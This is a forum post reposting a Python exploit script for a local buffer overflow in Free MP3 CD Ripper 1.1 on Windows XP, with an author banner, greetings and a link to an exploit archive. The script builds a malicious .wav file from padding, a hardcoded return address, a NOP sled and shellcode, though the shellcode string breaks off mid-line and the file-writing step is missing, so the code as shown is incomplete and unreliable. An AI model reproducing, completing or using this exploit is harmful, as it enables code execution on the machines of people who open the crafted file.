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 Free MP3 CD Ripper 1.1 Local Buffer Overflow

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Jumlah posting : 11
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Join date : 09.07.11

Free MP3 CD Ripper 1.1 Local Buffer Overflow Empty
PostSubyek: Free MP3 CD Ripper 1.1 Local Buffer Overflow   Free MP3 CD Ripper 1.1 Local Buffer Overflow Icon_minitimeSat Aug 27, 2011 7:39 pm

mirror : http://1337day.com/exploits/16770

# ############################################################################
# Exploit Title : Free MP3 CD Ripper 1.1 Local Buffer Overflow
# Software        : http://www.brothersoft.com/free-mp3-cd-ripper-84543.html
# Version        : 1.1
# Tested on        : Windows xp sp3 (en)
# Date            : 27/08/2011
# Author        : X-h4ck
# Website        : http://www.pirate.al , http://theflashcrew.blogspot.com
# Email            : mem001@live.com
# Greetz        : Wulns~ - Danzel - IllyrianWarrior- Ace - M4yh3m - Saldeath 
#                mywisdom - bi0 - Slimshaddy - d3trimentaL - Lekosta - Rigon
#                H-Down - H3ll - Pretorian
# ############################################################################

filename = "3v1lf1l3.wav"
print "cr34t1ng 3v1l f1l3"

junk ="\x41" * 4112
ret = "\xDC\x3A\xB4\x76"
nopsled = "\x90" * 15

shellcode = ("\x33\xc9\xb8\xa2\xe0\xe4\x44\xb1\x33\xda\xdf\xd9\x74\x24"

PirateAL = junk+ret+nopsled+shellcode
FILE = open(filename, "w")
print "t1m3 f0r pwn4g3"
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Free MP3 CD Ripper 1.1 Local Buffer Overflow
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